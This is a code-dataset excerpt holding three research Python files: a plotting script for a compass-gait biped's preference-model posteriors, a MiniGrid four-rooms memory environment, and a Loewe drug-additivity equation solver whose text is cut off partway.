hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k โ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 โ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 โ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k โ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 โ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 โ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k โ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 โ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 โ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
540974b01b23268f6d433583746dfaade82d9a64 | 6,190 | py | Python | Compass_gait_biped_simulations/Animate_posterior_compass_biped.py | ernovoseller/CoSpar | 2a9584dc9d1cdda5f7c0376ce744a18edab56cbb | [
"MIT"
] | 5 | 2020-11-18T14:05:13.000Z | 2021-05-18T15:00:33.000Z | Compass_gait_biped_simulations/Animate_posterior_compass_biped.py | ernovoseller/CoSpar | 2a9584dc9d1cdda5f7c0376ce744a18edab56cbb | [
"MIT"
] | null | null | null | Compass_gait_biped_simulations/Animate_posterior_compass_biped.py | ernovoseller/CoSpar | 2a9584dc9d1cdda5f7c0376ce744a18edab56cbb | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
For the ICRA video, we made some animations of how the preference model
posteriors evolve after each iteration. This script saves the stack of images
to make such an animation for the compass-gait biped's model posterior. For
every iteration, we save an image of the model posterior from one of the CG
biped simulation runs.
"""
import numpy as np
import scipy.io as io
import os
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams.update({'font.size': 18})
from Preference_GP_learning import feedback
# SET THE FOLLOWING FLAG TO EITHER TRUE OR FALSE, DEPENDING ON WHETHER THE
# MODEL POSTERIOR INFORMATION FOR ALL RUNS HAS ALREADY BEEN SAVED. If the
# posterior information is already computed and saved, setting this to True
# will save runtime. If you try setting this to True but the information is not
# saved, then you will get an error. If you set this to False, then all of the
# necessary information will be saved, such that you can set this to True if
# running this script ever again.
posterior_already_computed = True
# Folder for saving plots:
save_plots_folder = 'Plots/CG_biped_animation_plots/'
if not os.path.isdir(save_plots_folder):
os.makedirs(save_plots_folder)
# Folder for saving (or loading) posterior information:
save_info_folder = 'Plotting_data/CG_biped_sim_posteriors/'
if not os.path.isdir(save_info_folder):
os.makedirs(save_info_folder)
# Load data to use for plotting evolution of the posterior:
CG_sim_folder = 'Compass_biped_results/'
run_num = 0
num_samples = 2 # CoSpar parameter (n)
num_pts_sample = 24 # Number of points in input domain
data = io.loadmat(CG_sim_folder + 'Opt_' + str(num_samples) + '_samples_' \
+ str(num_pts_sample) + '_pts_run_' + str(run_num) + \
'.mat')
data_pt_idxs = data['data_pt_idxs'] # Data: points alg. selected in simulation
pref_nums = data_pt_idxs.shape[0]
# Domain over which learning occurred:
points_to_sample = np.linspace(0.08, 0.18, num_pts_sample)
# Determine dimensionality of state space:
if len(points_to_sample.shape) == 1:
state_dim = 1
else:
state_dim = points_to_sample.shape[1]
if not posterior_already_computed:
points_to_sample = points_to_sample.reshape((num_pts_sample, state_dim))
# Load preference labels and GP model hyperparameters:
labels = data['labels']
preference_noise = data['preference_noise'][0][0]
lengthscales = data['lengthscale'][0]
signal_variance = data['signal_variance'][0][0]
GP_noise_var = data['GP_noise_var'][0][0]
# Instantiate the prior covariance matrix, using a squared exponential
# kernel in each dimension of the input space:
GP_prior_cov = signal_variance * np.ones((num_pts_sample, num_pts_sample))
for i in range(num_pts_sample):
pt1 = points_to_sample[i, :]
for j in range(num_pts_sample):
pt2 = points_to_sample[j, :]
for dim in range(state_dim):
lengthscale = lengthscales[dim]
if lengthscale > 0:
GP_prior_cov[i, j] *= np.exp(-0.5 * ((pt2[dim] - pt1[dim]) / \
lengthscale)**2)
elif lengthscale == 0 and pt1[dim] != pt2[dim]:
GP_prior_cov[i, j] = 0
GP_prior_cov += GP_noise_var * np.eye(num_pts_sample)
GP_prior_cov_inv = np.linalg.inv(GP_prior_cov)
points_to_sample = points_to_sample.flatten()
# Make a plot for each iteration of the algorithm.
for pref_num in range(pref_nums + 1):
print('Iter %i of %i' % (pref_num, pref_nums))
# Get model posterior to use for this plot:
if not posterior_already_computed:
# Preference data at this iteration:
X = data_pt_idxs[: pref_num, :]
y = labels[: pref_num, 1]
# Update the Gaussian process preference model:
posterior_model = feedback(X, y, GP_prior_cov_inv, preference_noise)
# Unpack model posterior:
post_mean = posterior_model['mean']
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals']
else:
posterior_model = io.loadmat(save_info_folder + 'Compass_biped_' + \
str(pref_num) + '_preferences.mat')
# Unpack model posterior:
post_mean = posterior_model['post_mean'].flatten()
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals'].flatten()
# Construct posterior covariance matrix:
post_cov = cov_evecs @ np.diag(cov_evals) @ np.linalg.inv(cov_evecs)
# Posterior standard deviation at each point:
post_stdev = np.sqrt(np.diag(post_cov))
# Without title, used (8, 6). (8, 6.3) keeps the actual plot the same size
# while adding a title.
plt.figure(figsize = (8, 6.3))
# Plot posterior mean and standard deviation:
plt.plot(points_to_sample, post_mean, color = 'blue', linewidth = 3)
plt.fill_between(points_to_sample, post_mean - 2*post_stdev,
post_mean + 2*post_stdev, alpha = 0.3, color = 'blue')
plt.ylim([-0.035, 0.043])
plt.xlabel('Step length (m)')
plt.ylabel('Posterior Utility')
plt.title('Number of Trials: ' + str(pref_num * 2))
plt.xticks([0.08, 0.13, 0.18])
plt.yticks([-0.02, 0, 0.02, 0.04])
plt.tight_layout()
if not posterior_already_computed:
# Save information about posterior:
io.savemat(save_info_folder + 'Compass_biped_' + str(pref_num) + \
'_preferences.mat', {'post_mean': post_mean,
'cov_evecs': cov_evecs,
'cov_evals': cov_evals})
# Save plot:
plt.savefig(save_plots_folder + 'Compass_biped_2STD_' + str(pref_num) + \
'_preferences_titled.png')
plt.close('all')
| 35.780347 | 82 | 0.639742 | # -*- coding: utf-8 -*-
"""
For the ICRA video, we made some animations of how the preference model
posteriors evolve after each iteration. This script saves the stack of images
to make such an animation for the compass-gait biped's model posterior. For
every iteration, we save an image of the model posterior from one of the CG
biped simulation runs.
"""
import numpy as np
import scipy.io as io
import os
import matplotlib.pyplot as plt
from matplotlib import rcParams
rcParams.update({'font.size': 18})
from Preference_GP_learning import feedback
# SET THE FOLLOWING FLAG TO EITHER TRUE OR FALSE, DEPENDING ON WHETHER THE
# MODEL POSTERIOR INFORMATION FOR ALL RUNS HAS ALREADY BEEN SAVED. If the
# posterior information is already computed and saved, setting this to True
# will save runtime. If you try setting this to True but the information is not
# saved, then you will get an error. If you set this to False, then all of the
# necessary information will be saved, such that you can set this to True if
# running this script ever again.
posterior_already_computed = True
# Folder for saving plots:
save_plots_folder = 'Plots/CG_biped_animation_plots/'
if not os.path.isdir(save_plots_folder):
os.makedirs(save_plots_folder)
# Folder for saving (or loading) posterior information:
save_info_folder = 'Plotting_data/CG_biped_sim_posteriors/'
if not os.path.isdir(save_info_folder):
os.makedirs(save_info_folder)
# Load data to use for plotting evolution of the posterior:
CG_sim_folder = 'Compass_biped_results/'
run_num = 0
num_samples = 2 # CoSpar parameter (n)
num_pts_sample = 24 # Number of points in input domain
data = io.loadmat(CG_sim_folder + 'Opt_' + str(num_samples) + '_samples_' \
+ str(num_pts_sample) + '_pts_run_' + str(run_num) + \
'.mat')
data_pt_idxs = data['data_pt_idxs'] # Data: points alg. selected in simulation
pref_nums = data_pt_idxs.shape[0]
# Domain over which learning occurred:
points_to_sample = np.linspace(0.08, 0.18, num_pts_sample)
# Determine dimensionality of state space:
if len(points_to_sample.shape) == 1:
state_dim = 1
else:
state_dim = points_to_sample.shape[1]
if not posterior_already_computed:
points_to_sample = points_to_sample.reshape((num_pts_sample, state_dim))
# Load preference labels and GP model hyperparameters:
labels = data['labels']
preference_noise = data['preference_noise'][0][0]
lengthscales = data['lengthscale'][0]
signal_variance = data['signal_variance'][0][0]
GP_noise_var = data['GP_noise_var'][0][0]
# Instantiate the prior covariance matrix, using a squared exponential
# kernel in each dimension of the input space:
GP_prior_cov = signal_variance * np.ones((num_pts_sample, num_pts_sample))
for i in range(num_pts_sample):
pt1 = points_to_sample[i, :]
for j in range(num_pts_sample):
pt2 = points_to_sample[j, :]
for dim in range(state_dim):
lengthscale = lengthscales[dim]
if lengthscale > 0:
GP_prior_cov[i, j] *= np.exp(-0.5 * ((pt2[dim] - pt1[dim]) / \
lengthscale)**2)
elif lengthscale == 0 and pt1[dim] != pt2[dim]:
GP_prior_cov[i, j] = 0
GP_prior_cov += GP_noise_var * np.eye(num_pts_sample)
GP_prior_cov_inv = np.linalg.inv(GP_prior_cov)
points_to_sample = points_to_sample.flatten()
# Make a plot for each iteration of the algorithm.
for pref_num in range(pref_nums + 1):
print('Iter %i of %i' % (pref_num, pref_nums))
# Get model posterior to use for this plot:
if not posterior_already_computed:
# Preference data at this iteration:
X = data_pt_idxs[: pref_num, :]
y = labels[: pref_num, 1]
# Update the Gaussian process preference model:
posterior_model = feedback(X, y, GP_prior_cov_inv, preference_noise)
# Unpack model posterior:
post_mean = posterior_model['mean']
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals']
else:
posterior_model = io.loadmat(save_info_folder + 'Compass_biped_' + \
str(pref_num) + '_preferences.mat')
# Unpack model posterior:
post_mean = posterior_model['post_mean'].flatten()
cov_evecs = np.real(posterior_model['cov_evecs'])
cov_evals = posterior_model['cov_evals'].flatten()
# Construct posterior covariance matrix:
post_cov = cov_evecs @ np.diag(cov_evals) @ np.linalg.inv(cov_evecs)
# Posterior standard deviation at each point:
post_stdev = np.sqrt(np.diag(post_cov))
# Without title, used (8, 6). (8, 6.3) keeps the actual plot the same size
# while adding a title.
plt.figure(figsize = (8, 6.3))
# Plot posterior mean and standard deviation:
plt.plot(points_to_sample, post_mean, color = 'blue', linewidth = 3)
plt.fill_between(points_to_sample, post_mean - 2*post_stdev,
post_mean + 2*post_stdev, alpha = 0.3, color = 'blue')
plt.ylim([-0.035, 0.043])
plt.xlabel('Step length (m)')
plt.ylabel('Posterior Utility')
plt.title('Number of Trials: ' + str(pref_num * 2))
plt.xticks([0.08, 0.13, 0.18])
plt.yticks([-0.02, 0, 0.02, 0.04])
plt.tight_layout()
if not posterior_already_computed:
# Save information about posterior:
io.savemat(save_info_folder + 'Compass_biped_' + str(pref_num) + \
'_preferences.mat', {'post_mean': post_mean,
'cov_evecs': cov_evecs,
'cov_evals': cov_evals})
# Save plot:
plt.savefig(save_plots_folder + 'Compass_biped_2STD_' + str(pref_num) + \
'_preferences_titled.png')
plt.close('all')
| 0 | 0 | 0 |
c37a56745c7c38908f76b7304b7460e23194957e | 11,107 | py | Python | gym_minigrid/envs/fourrooms_memory.py | andreykurenkov/gym-minigrid | 2c053e8f78ebe6f7aa92cdf81c7539a4fffc12ec | [
"Apache-2.0"
] | null | null | null | gym_minigrid/envs/fourrooms_memory.py | andreykurenkov/gym-minigrid | 2c053e8f78ebe6f7aa92cdf81c7539a4fffc12ec | [
"Apache-2.0"
] | null | null | null | gym_minigrid/envs/fourrooms_memory.py | andreykurenkov/gym-minigrid | 2c053e8f78ebe6f7aa92cdf81c7539a4fffc12ec | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from gym_minigrid.minigrid import *
from gym_minigrid.register import register
from gym_minigrid.wrappers import RGBImgPartialObsWrapper
from gym_minigrid.wrappers import FrameStack
from collections import deque
from gym.spaces import Box
from gym import Wrapper
import numpy as np
import random
register(
id='MiniGrid-FourRoomsMemory-v0',
entry_point='gym_minigrid.envs:FourRoomsMemoryEnv'
)
register(
id='MiniGrid-FourRoomsMemoryRGB-v0',
entry_point='gym_minigrid.envs:rgb_env'
)
register(
id='MiniGrid-FourRoomsMemoryStacked-v0',
entry_point='gym_minigrid.envs:frame_stack_env'
)
| 33.966361 | 102 | 0.545062 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from gym_minigrid.minigrid import *
from gym_minigrid.register import register
from gym_minigrid.wrappers import RGBImgPartialObsWrapper
from gym_minigrid.wrappers import FrameStack
from collections import deque
from gym.spaces import Box
from gym import Wrapper
import numpy as np
import random
def create_shape(shape, color):
    """Instantiate the colored world-object for a given shape name.

    Args:
        shape: one of 'square', 'circle', 'triangle',
            'upside_down_triangle'.
        color: color name, passed straight to the object constructor.

    Returns:
        The matching Colored* world object, or None when the shape name
        is unrecognised (same fall-through behavior as the original
        if/elif chain).
    """
    # Dispatch table replaces the if/elif ladder; same four shapes.
    shape_classes = {
        'square': ColoredSquare,
        'circle': ColoredCircle,
        'triangle': ColoredTriangle,
        'upside_down_triangle': ColoredUpsideDownTriangle,
    }
    cls = shape_classes.get(shape)
    if cls is None:
        return None
    return cls(color)
class FourRoomsMemoryEnv(MiniGridEnv):
    """A 15x15 MiniGrid memory task built on a four-quadrant layout.

    Four clusters of colored shapes are placed around the center.  A "hint"
    object showing the goal shape/color is placed near the top of the grid
    (only when goals are randomized); the agent is rewarded for walking into
    the matching object elsewhere on the grid and penalized for walking into
    any other colored object.  Optionally, extra "bit" actions are appended
    to the action space so the agent can toggle an explicit external memory
    that is echoed back in the observation under the 'memory' key.
    """
    def __init__(self,
                 agent_pos=(7,7),
                 goal_pos=None,
                 random_seed=True,
                 random_goal=True,
                 random_rooms=False,
                 random_agent_pos=False,
                 room_walls=False,
                 room_shape_hints=False,
                 bits_actions=True,
                 num_bits = 8):
        """Configure layout/randomization flags and build the base env.

        The grid is fixed at 15x15 with a 100-step episode limit.  When
        ``bits_actions`` is True, a 'memory' entry is added to the
        observation space and the action space grows by 4 bit-toggle
        actions.
        """
        self._agent_default_pos = agent_pos
        self._goal_default_pos = goal_pos
        self._current_ep = 0
        # NOTE(review): with this huge period, `_current_ep % freq == 0` is
        # effectively true only on episode 0 for any realistic run.
        self._randomization_freq = 25000000000
        self._num_room_objs = 1
        self._random_seed = random_seed
        self._random_goal = random_goal
        self._random_rooms = random_rooms
        self._random_agent_pos = random_agent_pos
        self._room_walls = room_walls
        self._room_shape_hints = room_shape_hints
        self._bits_actions = bits_actions
        self._num_bits = num_bits
        self.shape_colors = ['red','green','blue','purple']
        self.shape_types = ['square','circle','triangle','upside_down_triangle']
        super().__init__(grid_size=15, max_steps=100)
        if bits_actions:
            # Extra observation slot exposing the agent-controlled bits.
            self.memory_observation_space = spaces.Box(
                low=0,
                high=255,
                shape=(1,),
                dtype='uint8'
            )
            self.observation_space.spaces['memory'] = self.memory_observation_space
            self.bits = [False]*num_bits
            # NOTE(review): only 4 extra actions are added even though
            # num_bits defaults to 8 — only bits 0-3 are reachable. Confirm
            # whether this mismatch is intentional.
            self.action_space = spaces.Discrete(len(self.actions)+4)
            # Integer mirror of `bits` (sum of 2**i for each set bit).
            self.bit_memory = 0
        else:
            self.observation_space = self.observation_space.spaces['image']
    def _gen_grid(self, width, height, reset = True):
        """Build walls, pick goal shape/color, and scatter the shape objects.

        NOTE(review): `reset` defaults to True and the base class calls
        `_gen_grid(width, height)`, so the `if reset:` branch re-randomizes
        goal and room assignment on every episode, overriding the
        `_randomization_freq` logic above it — confirm intent.
        """
        if not self._random_seed:
            # Deterministic layouts when seeding is disabled.
            self.seed(0)
            random.seed(0)
        # Create the grid
        self.grid = Grid(width, height)
        # Generate the surrounding walls
        self.grid.horz_wall(0, 0)
        self.grid.horz_wall(0, height - 1)
        self.grid.vert_wall(0, 0)
        self.grid.vert_wall(width - 1, 0)
        room_w = width // 3
        room_h = height // 3
        if self._room_walls:
            # Interior walls splitting the grid, each with one random gap.
            self.grid.horz_wall(0, room_h)
            self.grid.horz_wall(0, 2*room_h)
            self.grid.vert_wall(room_w, 0)
            self.grid.vert_wall(room_w*2, 0)
            pos = (room_w, self._rand_int(room_h+3, 2*room_h-3))
            self.grid.set(*pos, None)
            pos = (2*room_w, self._rand_int(room_h+3, 2*room_h-3))
            self.grid.set(*pos, None)
            pos = (self._rand_int(room_w+3, 2*room_w-3), room_h)
            self.grid.set(*pos, None)
            pos = (self._rand_int(room_w+3, 2*room_w-3), 2*room_h)
            self.grid.set(*pos, None)
        shape_colors = ['red','green','blue','purple']
        shape_types = ['square','circle','triangle','upside_down_triangle']
        if self._current_ep % self._randomization_freq == 0:
            if self._random_goal:
                self.goal_shape = random.choice(shape_types)
                self.goal_color = random.choice(shape_colors)
            else:
                self.goal_shape = 'triangle'
                self.goal_color = 'purple'
            if self._random_rooms:
                self.shape_rooms = list(shape_types)
                random.shuffle(self.shape_rooms)
            else:
                self.shape_rooms = shape_types = ['square','circle','triangle','upside_down_triangle']
        if reset:
            # Fresh goal and room-to-shape assignment every episode.
            self.shape_rooms = list(shape_types)
            random.shuffle(self.shape_rooms)
            self.goal_shape = random.choice(shape_types)
            self.goal_color = random.choice(shape_colors)
        hint_placements = [(width//2, 1),#height//2 - 3),
                           (width//2 + 3, height//2),
                           (width//2, height//2 + 3),
                           (width//2 - 3, height//2)]
        if self._random_goal:
            # The hint object shows the goal shape/color near the top wall.
            self.hint_placement = hint_placements[0]
            self.hint_obj = create_shape(self.goal_shape,self.goal_color)
            self.grid.set(*self.hint_placement, self.hint_obj)
        obj_placement = [(width//2, height//2 - 3),
                         (width//2 + 3, height//2),
                         (width//2, height//2 + 3),
                         (width//2 - 3, height//2)]
        if self._room_shape_hints:
            # Grey markers indicating which shape lives in which quadrant.
            for i in range(4):
                shape = self.shape_rooms[i]
                obj = create_shape(shape,'grey')
                self.grid.set(*obj_placement[i], obj)
        # Randomize the player start position and orientation
        if self._agent_default_pos is not None:
            self.agent_pos = self._agent_default_pos
            self.grid.set(*self._agent_default_pos, None)
            self.agent_dir = 3
        else:
            if self._random_agent_pos:
                pos = (self._rand_int(room_w+1, 2*room_w-1), self._rand_int(room_h+1, 2*room_h-1))
                self._agent_default_pos = pos
            else:
                self.agent_pos = (width//2,height//2)
            self.agent_dir = self._rand_int(0, 4)
            #self._agent_default_dir = self.agent_dir
        # Top-left corner of the placement region for each quadrant.
        room_tops = [(room_w+2,2),
                     (room_w*2+2,room_h+2),
                     (room_w+2,room_h*2+2),
                     (2,room_h+2)]
        for i in range(4):
            shape = self.shape_rooms[i]
            for j in range(self._num_room_objs):
                if shape==self.goal_shape and j==0:
                    # The first object of the goal shape gets the goal color.
                    color = self.goal_color
                else:
                    # Distractors must never carry the goal color.
                    color = random.choice(shape_colors)
                    while color == self.goal_color:
                        color = random.choice(shape_colors)
                obj = create_shape(shape,color)
                pos = self.place_obj(obj,room_tops[i],(room_w-4,room_h-4))
                if shape==self.goal_shape and j==0:
                    self.goal_pos = pos
        self.mission = 'win'
    def step(self, action):
        """Advance one timestep.

        Standard MiniGrid movement/interaction actions, plus actions >= 7
        which toggle the corresponding external-memory bit.  Walking into a
        colored object ends the episode with +5 if it matches the goal
        shape+color (and is not the hint object itself), otherwise -5.

        NOTE(review): the success check reads `self.hint_obj`, which is only
        assigned when `_random_goal` is True — confirm behavior when goals
        are fixed.
        """
        self.step_count += 1
        done = False
        reward = 0
        # Get the position in front of the agent
        fwd_pos = self.front_pos
        # Get the contents of the cell in front of the agent
        fwd_cell = self.grid.get(*fwd_pos)
        # Rotate left
        if action == self.actions.left:
            self.agent_dir -= 1
            if self.agent_dir < 0:
                self.agent_dir += 4
        # Rotate right
        elif action == self.actions.right:
            self.agent_dir = (self.agent_dir + 1) % 4
        # Move forward
        elif action == self.actions.forward:
            if fwd_cell == None or fwd_cell.can_overlap():
                self.agent_pos = fwd_pos
            if fwd_cell != None and fwd_cell.type == 'goal':
                done = True
            if fwd_cell != None and fwd_cell.type == 'lava':
                done = True
            if fwd_cell != None and \
               'colored' in fwd_cell.type:
                if fwd_cell.shape == self.goal_shape and \
                   fwd_cell.color == self.goal_color and \
                   fwd_cell!=self.hint_obj:
                    reward = 5#self._reward()
                    #self._gen_grid(30, 30, False)
                    done = True
                else:
                    reward = -5
        # Pick up an object
        elif action == self.actions.pickup:
            if fwd_cell and fwd_cell.can_pickup():
                if self.carrying is None:
                    self.carrying = fwd_cell
                    self.carrying.cur_pos = np.array([-1, -1])
                    self.grid.set(*fwd_pos, None)
        # Drop an object
        elif action == self.actions.drop:
            if not fwd_cell and self.carrying:
                self.grid.set(*fwd_pos, self.carrying)
                self.carrying.cur_pos = fwd_pos
                self.carrying = None
        # Toggle/activate an object
        elif action == self.actions.toggle:
            if fwd_cell:
                fwd_cell.toggle(self, fwd_pos)
        # Done action (not used by default)
        elif action == self.actions.done:
            pass
        elif action >= 7:
            # Bit-toggle actions: flip bits[action-7] and keep the integer
            # mirror `bit_memory` in sync.
            if not self.bits[action-7]:
                self.bit_memory+= 2**(action-7)
            else:
                self.bit_memory-= 2**(action-7)
            self.bits[action-7] = not self.bits[action-7]
        else:
            assert False, "unknown action"
        if self.step_count >= self.max_steps:
            # Timeout: add the distance-to-goal shaping penalty.
            done = True
            reward+= self._reward()
        if action > 2 and action < 7:
            # Small cost for non-movement interaction actions.
            reward-= 0.1
        # Disabled reward-shaping for the bit actions, kept as a bare string
        # literal (no runtime effect).
        '''
        elif action >= 7 and action < 11:
            shape_index = self.shape_types.index(self.goal_shape)
            if action-7 == shape_index:
                if self.bits[shape_index]:
                    reward+=0.5
                else:
                    reward-=0.5
            else:
                reward-=0.05
        elif action >=11:
            color_index = self.shape_colors.index(self.goal_color)
            if action-11 == color_index:
                if self.bits[color_index+4]:
                    reward+=0.5
                else:
                    reward-=0.5
            else:
                reward-=0.05
        '''
        obs = self.gen_obs()
        # Expose the external memory bits as 0/1 ints in the observation.
        obs['memory'] = [int(x) for x in self.bits]
        #obs = obs['image']
        return obs, reward, done, {}
    def _reward(self):
        """Negative Euclidean distance from agent to goal, scaled by 1/100."""
        agent_pos = np.array(self.agent_pos)
        goal_pos = np.array(self.goal_pos)
        reward = -np.linalg.norm(goal_pos - agent_pos)/100.0
        return reward
    def reset(self):
        """Reset the episode; clear the memory bits and bump the episode count."""
        obs = super().reset()
        if self._bits_actions:
            self.bits = [False]*self._num_bits
            self.bit_memory = 0
            obs['memory'] = [int(x) for x in self.bits]
        else:
            obs = obs['image']
        self._current_ep+=1
        return obs
register(
id='MiniGrid-FourRoomsMemory-v0',
entry_point='gym_minigrid.envs:FourRoomsMemoryEnv'
)
def rgb_env():
    """Registry factory: FourRoomsMemoryEnv with RGB pixel observations."""
    env = FourRoomsMemoryEnv()
    env = RGBImgPartialObsWrapper(env) # Get pixel observations
    return env
register(
id='MiniGrid-FourRoomsMemoryRGB-v0',
entry_point='gym_minigrid.envs:rgb_env'
)
def frame_stack_env():
    """Registry factory: FourRoomsMemoryEnv with 4 stacked frames."""
    env = FourRoomsMemoryEnv()
    env = FrameStack(env, 4)
    return env
register(
id='MiniGrid-FourRoomsMemoryStacked-v0',
entry_point='gym_minigrid.envs:frame_stack_env'
)
| 10,205 | 17 | 227 |
53c98d607588d8ce88a263df9e07ac14a254f1e0 | 3,518 | py | Python | Equation_Solver8.py | mmankowski/Loewe-additivity-calculator | 43f7135429a992d932d805dfa8a4c3b0b8fc769c | [
"MIT"
] | null | null | null | Equation_Solver8.py | mmankowski/Loewe-additivity-calculator | 43f7135429a992d932d805dfa8a4c3b0b8fc769c | [
"MIT"
] | null | null | null | Equation_Solver8.py | mmankowski/Loewe-additivity-calculator | 43f7135429a992d932d805dfa8a4c3b0b8fc769c | [
"MIT"
] | null | null | null | # to run open terminal window in location then type 'python "scriptname.py" "filename.csv" ' - "" indicates that these portions are replaced with actual file names
# import necessary libraries
import csv
import sys
import math
# read in the file & convert "that memory" into a csv read file
f = open(sys.argv[1],'rb')
r = csv.reader(f)
# start at row 0 (first row)
i = 0
rows = []
for row in r:
#adds an array to the list of arrays (arrays = list of variables); rows = list of lists, aka a 2D array -> defining the layout of spreadsheet
rows.append([])
#look at columns, but only for the current row
for col in row:
rows[i].append(col)
# look at row 1, then row 2, then row 3....
i+=1
answers = []
m1 = float(rows[2][11])
m2 = float(rows[2][11])
Fa1A = float(rows[2][11])
Fa1B = float(rows[2][11])
Fa2A = float(rows[2][11])
Fa2B = float(rows[2][11])
#m constant for each experiment (does not change w/ dilutions - slope from linear regressions of log(Fa/Fu) v log(Dose) )
#notation: 1A = 1.1, 1B = 1.2, 2A = 2.1, 2B = 2.2
for row in xrange(2,12):
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2A = float(rows[row][12])
Fu1A = 1-Fa1A
Fu2A = 1-Fa2A
rows[row][14] = equation_solver_wrapper(Fa1A, Fu1A, Fa2A, Fu2A, m1, m2)
rows[row][18] = 1 - rows[row][14]
rows[row][22] = math.log(rows[row][18]/rows[row][14] ,10)
except:
rows[row][14] = "DNE"
rows[row][18] = "DNE"
rows[row][22] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1A = float(rows[row][9])
Fa2B = float(rows[row][13])
Fu1A = 1-Fa1A
Fu2B = 1-Fa2B
rows[row][15] = equation_solver_wrapper(Fa1A, Fu1A, Fa2B, Fu2B, m1, m2)
rows[row][19] = 1 - rows[row][15]
rows[row][23] = math.log(rows[row][19]/rows[row][15],10)
except Exception as e:
rows[row][15] = "DNE"
rows[row][19] = "DNE"
rows[row][23] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2A = float(rows[row][12])
Fu1B = 1-Fa1B
Fu2A = 1-Fa2A
#guess Fu
rows[row][16] = equation_solver_wrapper(Fa1B, Fu1B, Fa2A, Fu2A, m1, m2)
#guess Fa
rows[row][20] = 1 - rows[row][16]
#guess inhib
rows[row][24] = math.log(rows[row][20]/rows[row][16],10)
except:
rows[row][16] = "DNE"
rows[row][20] = "DNE"
rows[row][24] = "DNE"
try:
m1 = float(rows[row][8])
m2 = float(rows[row][11])
Fa1B = float(rows[row][10])
Fa2B = float(rows[row][13])
Fu1B = 1-Fa1B
Fu2B = 1-Fa2B
rows[row][17] = equation_solver_wrapper(Fa1B, Fu1B, Fa2B, Fu2B, m1, m2)
rows[row][21] = 1 - rows[row][17]
rows[row][25] = math.log(rows[row][21]/rows[row][17],10)
except:
rows[row][17] = "DNE"
rows[row][21] = "DNE"
rows[row][25] = "DNE"
with open(sys.argv[2], "wb") as f:
writer = csv.writer(f)
writer.writerows(rows) | 24.774648 | 163 | 0.627345 | # to run open terminal window in location then type 'python "scriptname.py" "filename.csv" ' - "" indicates that these portions are replaced with actual file names
# import necessary libraries
import csv
import sys
import math
# read in the file & convert "that memory" into a csv read file
f = open(sys.argv[1],'rb')
r = csv.reader(f)
# start at row 0 (first row)
i = 0
rows = []
for row in r:
#adds an array to the list of arrays (arrays = list of variables); rows = list of lists, aka a 2D array -> defining the layout of spreadsheet
rows.append([])
#look at columns, but only for the current row
for col in row:
rows[i].append(col)
# look at row 1, then row 2, then row 3....
i+=1
answers = []
m1 = float(rows[2][11])
m2 = float(rows[2][11])
Fa1A = float(rows[2][11])
Fa1B = float(rows[2][11])
Fa2A = float(rows[2][11])
Fa2B = float(rows[2][11])
#m constant for each experiment (does not change w/ dilutions - slope from linear regressions of log(Fa/Fu) v log(Dose) )
#notation: 1A = 1.1, 1B = 1.2, 2A = 2.1, 2B = 2.2
def helper(numerator, denominator, exponent):
    """Return (numerator / denominator) ** (1 / exponent).

    Inverts the median-effect relation: given an affected/unaffected
    fraction ratio and the slope `exponent` (m), recover the relative dose.
    Uses 1.0/exponent so an integer exponent cannot trigger Python 2
    integer division.
    """
    return (numerator / denominator) ** (1.0 / exponent)
def solve_equation(First1, First2, Third1, Third2, m1, m2, FU):
    """Evaluate the Loewe-additivity sum for a guessed unaffected fraction.

    Args:
        First1, First2: Fa/Fu pair for drug 1.
        Third1, Third2: Fa/Fu pair for drug 2.
        m1, m2: median-effect slopes for drugs 1 and 2.
        FU: guessed unaffected fraction of the combination, in (0, 1).

    Returns:
        The two-term dose-ratio sum; additivity corresponds to a value of 1.
    """
    first = helper(First1, First2, m1)
    second = helper(FU, 1 - FU, m1)
    third = helper(Third1, Third2, m2)
    fourth = helper(FU, 1 - FU, m2)
    return (first * second) + (third * fourth)
def equation_solver_wrapper(First1, First2, Third1, Third2, m1, m2):
    """Bisection-solve for FU in (0, 1) so that solve_equation(...) == 1.

    Starts at 0.5 with a step of 0.25, halving the step each iteration for
    100 iterations (ample for double precision).  `range` replaces the
    Python-2-only `xrange` and works identically on both interpreters.
    """
    guess = 0.5
    step = 0.25
    for _ in range(100):
        result = solve_equation(First1, First2, Third1, Third2, m1, m2, guess)
        if result > 1:
            guess -= step
        elif result < 1:
            guess += step
        else:
            # Exact hit: stop early.
            break
        step = step / 2.0
    return guess
for row in xrange(2,12):
try:
m1 = float(rows[row][8])
